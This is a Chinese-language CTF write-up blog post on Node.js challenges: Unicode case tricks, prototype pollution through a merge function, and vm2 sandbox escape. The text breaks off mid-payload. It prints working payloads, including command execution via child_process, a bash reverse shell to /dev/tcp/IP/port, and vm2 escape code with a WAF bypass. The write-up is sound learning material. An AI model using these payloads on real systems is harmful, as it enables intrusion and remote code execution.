<!DOCTYPE html>
<html lang="zh-CN">
    <head prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article#">
    <meta charset="UTF-8" />

    <meta name="generator" content="Hugo 0.83.1" /><meta name="theme-color" content="#fff" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    
    <meta name="format-detection" content="telephone=no, date=no, address=no, email=no" />
    
    <meta http-equiv="Cache-Control" content="no-transform" />
    
    <meta http-equiv="Cache-Control" content="no-siteapp" />

    <title>BUU刷题记录-Nodejs漏洞学习 | tyskillのBlog</title>

    <link rel="stylesheet" href="/css/meme.min.8ee5871f60198596433004ff3104e539be2abd792bec92ebaa564335628479fa.css"/>

    
    
        <script src="/js/meme.min.8cbe976441b5181abfd3093c9beee209b19cdbb1fa77c48d225a83ba81fa3fb1.js"></script>

    

    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />

        <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=EB&#43;Garamond:ital,wght@0,400;0,500;0,700;1,400;1,700&amp;family=Noto&#43;Serif&#43;SC:wght@400;500;700&amp;family=Source&#43;Code&#43;Pro:ital,wght@0,400;0,700;1,400;1,700&amp;display=swap" media="print" onload="this.media='all'" />
        <noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=EB&#43;Garamond:ital,wght@0,400;0,500;0,700;1,400;1,700&amp;family=Noto&#43;Serif&#43;SC:wght@400;500;700&amp;family=Source&#43;Code&#43;Pro:ital,wght@0,400;0,700;1,400;1,700&amp;display=swap" /></noscript>

    <meta name="author" content="tyskill" /><meta name="description" content="[GYCTF2020]Ez_Express 首页一个登录框和一个提示框，提示框内容： 友情提示 如果您还不是会员，请注册 用户名只支……" />

    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg" color="#2a6df4" />
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png" />
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-title" content="tyskillのBlog" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black" />
    <meta name="mobile-web-app-capable" content="yes" />
    <meta name="application-name" content="tyskillのBlog" />
    <meta name="msapplication-starturl" content="../../" />
    <meta name="msapplication-TileColor" content="#fff" />
    <meta name="msapplication-TileImage" content="../../icons/mstile-150x150.png" />
    <link rel="manifest" href="/manifest.json" />

    
    

    
    <link rel="canonical" href="https://tyskill.github.io/posts/nodejs%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/" />
    

<script type="application/ld+json">
    {
        "@context": "https://schema.org",
        "@type": "BlogPosting",
        "datePublished": "2020-10-15T00:00:00+00:00",
        "dateModified": "2020-10-20T00:00:00+00:00",
        "url": "https://tyskill.github.io/posts/nodejs%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/",
        "headline": "BUU刷题记录-Nodejs漏洞学习",
        "description": "[GYCTF2020]Ez_Express 首页一个登录框和一个提示框，提示框内容： 友情提示 如果您还不是会员，请注册 用户名只支……",
        "inLanguage" : "zh-CN",
        "articleSection": "posts",
        "wordCount":  1965 ,
        "image": "https://tyskill.github.io/icons/favicon.ico",
        "author": {
            "@type": "Person",
            "email": "tyskill@foxmail.com",
            "image": "https://tyskill.github.io/icons/favicon.ico",
            "url": "https://tyskill.github.io",
            "name": "tyskill"
        },
        "license": "[CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh)",
        "publisher": {
            "@type": "Organization",
            "name": "tyskillのBlog",
            "logo": {
                "@type": "ImageObject",
                "url": "https://tyskill.github.io/icons/favicon.ico"
            },
            "url": "https://tyskill.github.io/"
        },
        "mainEntityOfPage": {
            "@type": "WebSite",
            "@id": "https://tyskill.github.io/"
        }
    }
</script>

    

<meta name="twitter:card" content="summary" />


    



<meta property="og:title" content="BUU刷题记录-Nodejs漏洞学习" />
<meta property="og:description" content="[GYCTF2020]Ez_Express 首页一个登录框和一个提示框，提示框内容： 友情提示 如果您还不是会员，请注册 用户名只支……" />
<meta property="og:url" content="https://tyskill.github.io/posts/nodejs%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/" />
<meta property="og:site_name" content="tyskillのBlog" />
<meta property="og:locale" content="zh" /><meta property="og:image" content="https://tyskill.github.io/icons/favicon.ico" />
    <meta property="og:type" content="article" />
    <meta property="article:published_time" content="2020-10-15T00:00:00&#43;00:00" />
    <meta property="article:modified_time" content="2020-10-20T00:00:00&#43;00:00" />
    
    <meta property="article:section" content="posts" />



    
    

    
</head>

    <body>
        <div class="container">
            
    <header class="header">
        
            <div class="header-wrapper">
                <div class="header-inner single">
                    
    <div class="site-brand">
        
            <a href="/" class="brand">tyskillのBlog</a>
        
    </div>

                    <nav class="nav">
    <ul class="menu" id="menu">
        
            
        
        
        
        
            
                <li class="menu-item"><a href="/"><span class="menu-item-name">首页</span></a>
                </li>
            
        
            
                <li class="menu-item"><a href="/posts/"><span class="menu-item-name">归档</span></a>
                </li>
            
        
            
                <li class="menu-item"><a href="/categories/"><span class="menu-item-name">分类</span></a>
                </li>
            
        
            
                <li class="menu-item"><a href="/tags/"><span class="menu-item-name">标签</span></a>
                </li>
            
        
            
                <li class="menu-item"><a href="/links/"><span class="menu-item-name">友链</span></a>
                </li>
            
        
            
                <li class="menu-item"><a href="/about/"><span class="menu-item-name">关于</span></a>
                </li>
            
        
            
                
                    
                    
                        <li class="menu-item">
                            <a id="theme-switcher" href="#"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon theme-icon-light"><path d="M193.2 104.5l48.8-97.5a18 18 0 0128 0l48.8 97.5 103.4 -34.5a18 18 0 0119.8 19.8l-34.5 103.4l97.5 48.8a18 18 0 010 28l-97.5 48.8 34.5 103.4a18 18 0 01-19.8 19.8l-103.4-34.5-48.8 97.5a18 18 0 01-28 0l-48.8-97.5l-103.4 34.5a18 18 0 01-19.8-19.8l34.5-103.4-97.5-48.8a18 18 0 010-28l97.5-48.8-34.5-103.4a18 18 0 0119.8-19.8zM256 128a128 128 0 10.01 0M256 160a96 96 0 10.01 0"/></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon theme-icon-dark"><path d="M27 412a256 256 0 10154-407a11.5 11.5 0 00-5 20a201.5 201.5 0 01-134 374a11.5 11.5 0 00-15 13"/></svg></a>
                        </li>
                    
                
            
        
            
                
            
        
            
                
            
        
    </ul>
</nav>

                    
                </div>
            </div>
            
    <input type="checkbox" id="nav-toggle" aria-hidden="true" />
    <label for="nav-toggle" class="nav-toggle"></label>
    <label for="nav-toggle" class="nav-curtain"></label>


        
    </header>




            
            
    <main class="main single" id="main">
    <div class="main-inner">

        

        <article class="content post h-entry" data-align="justify" data-type="posts" data-toc-num="true">

            <h1 class="post-title p-name">BUU刷题记录-Nodejs漏洞学习</h1>

            

            
                
            

            
                

<div class="post-meta">
    
        
        <time datetime="2020-10-15T00:00:00&#43;00:00" class="post-meta-item published dt-published"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" class="icon post-meta-icon"><path d="M148 288h-40c-6.6 0-12-5.4-12-12v-40c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v40c0 6.6-5.4 12-12 12zm108-12v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm96 0v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm-96 96v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm-96 0v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm192 0v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm96-260v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V112c0-26.5 21.5-48 48-48h48V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h128V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h48c26.5 0 48 21.5 48 48zm-48 346V160H48v298c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"/></svg>&nbsp;2020.10.15</time>
    
    
        
        <time datetime="2020-10-20T00:00:00&#43;00:00" class="post-meta-item modified dt-updated"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" class="icon post-meta-icon"><path d="M400 64h-48V12c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v52H160V12c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v52H48C21.49 64 0 85.49 0 112v352c0 26.51 21.49 48 48 48h352c26.51 0 48-21.49 48-48V112c0-26.51-21.49-48-48-48zm-6 400H54a6 6 0 0 1-6-6V160h352v298a6 6 0 0 1-6 6zm-52.849-200.65L198.842 404.519c-4.705 4.667-12.303 4.637-16.971-.068l-75.091-75.699c-4.667-4.705-4.637-12.303.068-16.971l22.719-22.536c4.705-4.667 12.303-4.637 16.97.069l44.104 44.461 111.072-110.181c4.705-4.667 12.303-4.637 16.971.068l22.536 22.718c4.667 4.705 4.636 12.303-.069 16.97z"/></svg>&nbsp;2020.10.20</time>
    
    
    
        
        
        
            
                <span class="post-meta-item category"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon post-meta-icon"><path d="M464 128H272l-54.63-54.63c-6-6-14.14-9.37-22.63-9.37H48C21.49 64 0 85.49 0 112v288c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V176c0-26.51-21.49-48-48-48zm0 272H48V112h140.12l54.63 54.63c6 6 14.14 9.37 22.63 9.37H464v224z"/></svg>&nbsp;<a href="/categories/ctf/" class="category-link p-category">CTF</a></span>
            
        
    
    
        
        <span class="post-meta-item wordcount"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon post-meta-icon"><path d="M497.9 142.1l-46.1 46.1c-4.7 4.7-12.3 4.7-17 0l-111-111c-4.7-4.7-4.7-12.3 0-17l46.1-46.1c18.7-18.7 49.1-18.7 67.9 0l60.1 60.1c18.8 18.7 18.8 49.1 0 67.9zM284.2 99.8L21.6 362.4.4 483.9c-2.9 16.4 11.4 30.6 27.8 27.8l121.5-21.3 262.6-262.6c4.7-4.7 4.7-12.3 0-17l-111-111c-4.8-4.7-12.4-4.7-17.1 0zM124.1 339.9c-5.5-5.5-5.5-14.3 0-19.8l154-154c5.5-5.5 14.3-5.5 19.8 0s5.5 14.3 0 19.8l-154 154c-5.5 5.5-14.3 5.5-19.8 0zM88 424h48v36.3l-64.5 11.3-31.1-31.1L51.7 376H88v48z"/></svg>&nbsp;1965</span>
    
    
        
        <span class="post-meta-item reading-time"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon post-meta-icon"><path d="M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm61.8-104.4l-84.9-61.7c-3.1-2.3-4.9-5.9-4.9-9.7V116c0-6.6 5.4-12 12-12h32c6.6 0 12 5.4 12 12v141.7l66.8 48.6c5.4 3.9 6.5 11.4 2.6 16.8L334.6 349c-3.9 5.3-11.4 6.5-16.8 2.6z"/></svg>&nbsp;4&nbsp;分钟</span>
    
    
    
</div>

            

            <nav class="contents">
  <h2 id="contents" class="contents-title">目录</h2><ol class="toc">
    <li><a id="contents:方法一---vm2逃逸" href="#方法一---vm2逃逸">方法一 - vm2逃逸</a></li>
    <li><a id="contents:方法二---buffer读取" href="#方法二---buffer读取">方法二 - Buffer读取</a></li>
  </ol>
</nav><div class="post-body e-content">
              <h1 id="gyctf2020ez_express"><a href="#gyctf2020ez_express" class="anchor-link"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon anchor-icon"><path d="M326.612 185.391c59.747 59.809 58.927 155.698.36 214.59-.11.12-.24.25-.36.37l-67.2 67.2c-59.27 59.27-155.699 59.262-214.96 0-59.27-59.26-59.27-155.7 0-214.96l37.106-37.106c9.84-9.84 26.786-3.3 27.294 10.606.648 17.722 3.826 35.527 9.69 52.721 1.986 5.822.567 12.262-3.783 16.612l-13.087 13.087c-28.026 28.026-28.905 73.66-1.155 101.96 28.024 28.579 74.086 28.749 102.325.51l67.2-67.19c28.191-28.191 28.073-73.757 0-101.83-3.701-3.694-7.429-6.564-10.341-8.569a16.037 16.037 0 0 1-6.947-12.606c-.396-10.567 3.348-21.456 11.698-29.806l21.054-21.055c5.521-5.521 14.182-6.199 20.584-1.731a152.482 152.482 0 0 1 20.522 17.197zM467.547 44.449c-59.261-59.262-155.69-59.27-214.96 0l-67.2 67.2c-.12.12-.25.25-.36.37-58.566 58.892-59.387 154.781.36 214.59a152.454 152.454 0 0 0 20.521 17.196c6.402 4.468 15.064 3.789 20.584-1.731l21.054-21.055c8.35-8.35 12.094-19.239 11.698-29.806a16.037 16.037 0 0 0-6.947-12.606c-2.912-2.005-6.64-4.875-10.341-8.569-28.073-28.073-28.191-73.639 0-101.83l67.2-67.19c28.239-28.239 74.3-28.069 102.325.51 27.75 28.3 26.872 73.934-1.155 101.96l-13.087 13.087c-4.35 4.35-5.769 10.79-3.783 16.612 5.864 17.194 9.042 34.999 9.69 52.721.509 13.906 17.454 20.446 27.294 10.606l37.106-37.106c59.271-59.259 59.271-155.699.001-214.959z"/></svg></a><a href="#contents:gyctf2020ez_express" class="headings">[GYCTF2020]Ez_Express</a></h1>
<p>首页一个登录框和一个提示框，提示框内容：</p>
<blockquote>
<p>友情提示<br>
如果您还不是会员，请注册<br>
用户名只支持大写<br>
请使用ADMIN登录</p>
</blockquote>
<p>在<a href="https://xz.aliyun.com/t/7184" target="_blank" rel="noopener">Node.js 常见漏洞学习与总结</a>文章中描述了<strong>javascript大小写特性</strong>：</p>
<blockquote>
<p>对于toUpperCase(): 字符<code>&quot;ı&quot;</code>、<code>&quot;ſ&quot;</code> 经过toUpperCase处理后结果为 <code>&quot;I&quot;</code>、<code>&quot;S&quot;</code>\</p>
<p>对于toLowerCase(): 字符<code>&quot;K&quot;</code>经过toLowerCase处理后结果为<code>&quot;k&quot;</code>(这个K不是K)</p>
</blockquote>
<p>注册账号<code>ADMıN</code>之后，又给了一个提示框：</p>
<blockquote>
<p>Hint: Hello,ADMIN ,flag in /flag</p>
</blockquote>
<p>且源码提示<code>/www.zip</code>存在源码泄露。</p>
<p>审计一波，在index.js代码文件发现了merge函数，<a href="https://xz.aliyun.com/t/7184" target="_blank" rel="noopener">Node.js 常见漏洞学习与总结</a>文章中同样总结merge函数，考点是<a href="https://www.anquanke.com/post/id/176884" target="_blank" rel="noopener">原型链污染</a>。</p>
<p>继续寻找，路由<code>/action</code>中调用了merge函数：</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-javascript" data-lang="javascript"><span class="nx">router</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">&#39;/action&#39;</span><span class="p">,</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">session</span><span class="p">.</span><span class="nx">user</span><span class="p">.</span><span class="nx">user</span><span class="o">!=</span><span class="s2">&#34;ADMIN&#34;</span><span class="p">){</span><span class="nx">res</span><span class="p">.</span><span class="nx">end</span><span class="p">(</span><span class="s2">&#34;&lt;script&gt;alert(&#39;ADMIN is asked&#39;);history.go(-1);&lt;/script&gt;&#34;</span><span class="p">)}</span>
  <span class="nx">req</span><span class="p">.</span><span class="nx">session</span><span class="p">.</span><span class="nx">user</span><span class="p">.</span><span class="nx">data</span> <span class="o">=</span> <span class="nx">clone</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">);</span>
  <span class="nx">res</span><span class="p">.</span><span class="nx">end</span><span class="p">(</span><span class="s2">&#34;&lt;script&gt;alert(&#39;success&#39;);history.go(-1);&lt;/script&gt;&#34;</span><span class="p">);</span>  
<span class="p">});</span>
</code></pre></td></tr></table></div>
</div>
</div><p>但是这里并没有执行命令和回显字段的函数，所以继续向下寻找，在<code>/info</code>找到了利用点：</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-javascript" data-lang="javascript"><span class="nx">router</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">&#39;/info&#39;</span><span class="p">,</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">{</span>
  <span class="nx">res</span><span class="p">.</span><span class="nx">render</span><span class="p">(</span><span class="s1">&#39;index&#39;</span><span class="p">,</span><span class="nx">data</span><span class="o">=</span><span class="p">{</span><span class="s1">&#39;user&#39;</span><span class="o">:</span><span class="nx">res</span><span class="p">.</span><span class="nx">outputFunctionName</span><span class="p">});</span>
<span class="p">})</span>
</code></pre></td></tr></table></div>
</div>
</div><p>老朋友<code>render</code>，将内容渲染到index，且</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-javascript" data-lang="javascript"><span class="nx">res</span><span class="p">.</span><span class="nx">outputFunctionName</span><span class="o">=</span><span class="kc">undefined</span><span class="p">;</span>
</code></pre></td></tr></table></div>
</div>
</div><p>我们可以利用这个去实现污染，抓包<code>/action</code>，将Content-Type改成<code>application/json</code>，发送payload。</p>
<p>payload</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-javascript" data-lang="javascript"><span class="c1">// 回显字符串
</span><span class="c1"></span><span class="p">{</span><span class="s2">&#34;lua&#34;</span><span class="o">:</span><span class="s2">&#34;a&#34;</span><span class="p">,</span><span class="s2">&#34;__proto__&#34;</span><span class="o">:</span><span class="p">{</span><span class="s2">&#34;outputFunctionName&#34;</span><span class="o">:</span><span class="s2">&#34;t=1;return global.process.mainModule.constructor._load(&#39;child_process&#39;).execSync(&#39;cat /flag&#39;).toString()//&#34;</span><span class="p">},</span><span class="s2">&#34;Submit&#34;</span><span class="o">:</span><span class="s2">&#34;&#34;</span><span class="p">}</span>
<span class="c1">// 弹shell
</span><span class="c1"></span><span class="p">{</span><span class="s2">&#34;__proto__&#34;</span><span class="o">:</span><span class="p">{</span><span class="s2">&#34;outputFunctionName&#34;</span><span class="o">:</span><span class="s2">&#34;a=1;global.process.mainModule.constructor._load(&#39;child_process&#39;).exec(&#39;bash -c \&#34;bash -i &gt;&amp; /dev/tcp/IP/port 0&gt;&amp;1\&#34;&#39;)//&#34;</span><span class="p">}}</span>
</code></pre></td></tr></table></div>
</div>
</div><p>疑问：</p>
<ol>
<li>为什么第一个payload中的<code>t=1;</code>不加就会报语法错误，不知道是不是只有return导致函数结构不完整(加了<code>t=1;</code>也不完整。。。)；(<strong>未解决</strong>)</li>
<li><code>execSync</code>用<code>exec</code>替代时会回显<code>[object Object]</code>，而该对象的属性中并没有执行我们传入的的系统命令。</li>
</ol>
<blockquote>
<p>两个函数在Nodejs文档中这样介绍：<br>
      child_process.exec() 返回: <code>&lt;ChildProcess&gt;</code><br>
      child_process.execSync() 返回: <code>&lt;Buffer&gt;</code> | <code>&lt;string&gt;</code> 命令的 stdout。</p>
</blockquote>
<h1 id="hfctf2020justescape"><a href="#hfctf2020justescape" class="anchor-link"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon anchor-icon"><path d="M326.612 185.391c59.747 59.809 58.927 155.698.36 214.59-.11.12-.24.25-.36.37l-67.2 67.2c-59.27 59.27-155.699 59.262-214.96 0-59.27-59.26-59.27-155.7 0-214.96l37.106-37.106c9.84-9.84 26.786-3.3 27.294 10.606.648 17.722 3.826 35.527 9.69 52.721 1.986 5.822.567 12.262-3.783 16.612l-13.087 13.087c-28.026 28.026-28.905 73.66-1.155 101.96 28.024 28.579 74.086 28.749 102.325.51l67.2-67.19c28.191-28.191 28.073-73.757 0-101.83-3.701-3.694-7.429-6.564-10.341-8.569a16.037 16.037 0 0 1-6.947-12.606c-.396-10.567 3.348-21.456 11.698-29.806l21.054-21.055c5.521-5.521 14.182-6.199 20.584-1.731a152.482 152.482 0 0 1 20.522 17.197zM467.547 44.449c-59.261-59.262-155.69-59.27-214.96 0l-67.2 67.2c-.12.12-.25.25-.36.37-58.566 58.892-59.387 154.781.36 214.59a152.454 152.454 0 0 0 20.521 17.196c6.402 4.468 15.064 3.789 20.584-1.731l21.054-21.055c8.35-8.35 12.094-19.239 11.698-29.806a16.037 16.037 0 0 0-6.947-12.606c-2.912-2.005-6.64-4.875-10.341-8.569-28.073-28.073-28.191-73.639 0-101.83l67.2-67.19c28.239-28.239 74.3-28.069 102.325.51 27.75 28.3 26.872 73.934-1.155 101.96l-13.087 13.087c-4.35 4.35-5.769 10.79-3.783 16.612 5.864 17.194 9.042 34.999 9.69 52.721.509 13.906 17.454 20.446 27.294 10.606l37.106-37.106c59.271-59.259 59.271-155.699.001-214.959z"/></svg></a><a href="#contents:hfctf2020justescape" class="headings">[HFCTF2020]JustEscape</a></h1>
<p>主页面提示信息：</p>
<blockquote>
<p>真的是 PHP 嘛 \</p>
</blockquote>
<p>      再结合前面的<code>new%20Date()</code>，本地php尝试一波发现不存在Date类(不排除出题人定义了一个Date类，但是这样不是浪费时间嘛)，百度一下<code>new%20Date()</code>，输出的都是Js的内容，应该确定了考点就是Js。</p>
<p>接下来访问<code>run.php</code>，得到源码：</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-php" data-lang="php"><span class="o">&lt;?</span><span class="nx">php</span>
<span class="k">if</span><span class="p">(</span> <span class="nx">array_key_exists</span><span class="p">(</span> <span class="s2">&#34;code&#34;</span><span class="p">,</span> <span class="nv">$_GET</span> <span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nv">$_GET</span><span class="p">[</span> <span class="s1">&#39;code&#39;</span> <span class="p">]</span> <span class="o">!=</span> <span class="k">NULL</span> <span class="p">)</span> <span class="p">{</span>
    <span class="nv">$code</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;code&#39;</span><span class="p">];</span>
    <span class="k">echo</span> <span class="k">eval</span><span class="p">(</span><span class="nx">code</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="nx">highlight_file</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
<span class="cp">?&gt;</span><span class="err">
</span></code></pre></td></tr></table></div>
</div>
</div><p>看到这有点迷惑，难道猜错了？搜了一下才知道原来Js也有eval函数，现在完全确定这就是Js。</p>
<p>      输入引号后回显hacking，存在waf，就不fuzz了。参考<a href="https://artsploit.blogspot.com/2016/08/pprce2.html" target="_blank" rel="noopener">Node.js code injection (RCE)</a>数组绕过方法，使用常规payload：<code>require('child_process').exec('ls');</code>，回显<code>ReferenceError: require is not defined</code>，没思路了，看<a href="https://blog.csdn.net/a3320315/article/details/105619800" target="_blank" rel="noopener">wp</a>。</p>
<p>输入<code>Error().stack</code>，回显错误信息：</p>
<blockquote>
<p>VM.run (/app/node_modules/vm2/lib/main.js:219:62)</p>
</blockquote>
<p>研究一下为什么会用<code>Error().stack</code>：</p>
<blockquote>
<p><code>Error().stack</code>可以分为两个过程：</p>
<ol>
<li>实例化Error类</li>
<li>调用stack方法</li>
</ol>
<p>同理，<code>new Error().stack</code>也能够回显相同内容。<br>
<br>
介绍一下<code>Error类</code>：<br>
      Error 对象会<strong>捕获堆栈跟踪，详细说明实例化 Error 的代码点</strong>，并可能提供错误的文本描述。<br>
      <strong>详细说明实例化 Error 的代码点</strong>这个功能提供了返回代码信息甚至文件信息的可能性。<br>
接下来介绍<code>stack属性</code>：<br>
      <code>Error.captureStackTrace(targetObject[, constructorOpt])</code>方法在 targetObject 上创建一个 <code>.stack 属性</code>，<u>当访问时返回一个表示代码中调用 Error.captureStackTrace() 的位置的字符串</u>。<br>
      也就是说当我们实例化Error类并调用stack属性时，我们会得到<strong>调用 Error.captureStackTrace() 的位置的字符串</strong>，也就是代码的部分信息。</p>
</blockquote>
<p>言归正传，从回显内容我们能发现使用的是<code>vm2</code>，上payload：</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-js" data-lang="js"><span class="c1">// payload1 -- 改自vm2-3.83版本的逃逸代码
</span><span class="c1"></span><span class="k">try</span><span class="p">{</span>
  <span class="nx">Buffer</span><span class="p">.</span><span class="nx">from</span><span class="p">(</span><span class="k">new</span> <span class="nb">Proxy</span><span class="p">({},{</span>
    <span class="nx">getOwnPropertyDescriptor</span><span class="p">(){</span>
      <span class="k">throw</span> <span class="nx">f</span><span class="p">=&gt;</span><span class="nx">f</span><span class="p">.</span><span class="nx">constructor</span><span class="p">(</span><span class="s2">&#34;return process&#34;</span><span class="p">)();</span>
    <span class="p">}</span>
  <span class="p">}));</span>
<span class="p">}</span><span class="k">catch</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span>
  <span class="nx">e</span><span class="p">(()=&gt;{}).</span><span class="nx">mainModule</span><span class="p">.</span><span class="nx">require</span><span class="p">(</span><span class="s2">&#34;child_process&#34;</span><span class="p">).</span><span class="nx">execSync</span><span class="p">(</span><span class="s2">&#34;whoami&#34;</span><span class="p">).</span><span class="nx">toString</span><span class="p">();</span>
<span class="p">}</span>
<span class="c1">// 此方法需要配合上面提到的数组绕过方法，否则引号会被waf。
</span><span class="c1"></span>
<span class="c1">// payload2 -- 反引号替代引号；${}拼接字符串，引入变量
</span><span class="c1"></span><span class="p">(</span><span class="kd">function</span> <span class="p">(){</span>
    <span class="nx">TypeError</span><span class="p">[</span><span class="sb">`</span><span class="si">${</span><span class="sb">`</span><span class="si">${</span><span class="sb">`prototyp`</span><span class="si">}</span><span class="sb">e`</span><span class="si">}</span><span class="sb">`</span><span class="p">][</span><span class="sb">`</span><span class="si">${</span><span class="sb">`</span><span class="si">${</span><span class="sb">`get_pro`</span><span class="si">}</span><span class="sb">cess`</span><span class="si">}</span><span class="sb">`</span><span class="p">]</span> <span class="o">=</span> <span class="nx">f</span><span class="p">=&gt;</span><span class="nx">f</span><span class="p">[</span><span class="sb">`</span><span class="si">${</span><span class="sb">`</span><span class="si">${</span><span class="sb">`constructo`</span><span class="si">}</span><span class="sb">r`</span><span class="si">}</span><span class="sb">`</span><span class="p">](</span><span class="sb">`</span><span class="si">${</span><span class="sb">`</span><span class="si">${</span><span class="sb">`return proc`</span><span class="si">}</span><span class="sb">ess`</span><span class="si">}</span><span class="sb">`</span><span class="p">)();</span>
    <span class="k">try</span><span class="p">{</span>
        <span class="nb">Object</span><span class="p">.</span><span class="nx">preventExtensions</span><span class="p">(</span><span class="nx">Buffer</span><span class="p">.</span><span class="nx">from</span><span class="p">(</span><span class="sb">``</span><span class="p">)).</span><span class="nx">a</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span><span class="k">catch</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span>
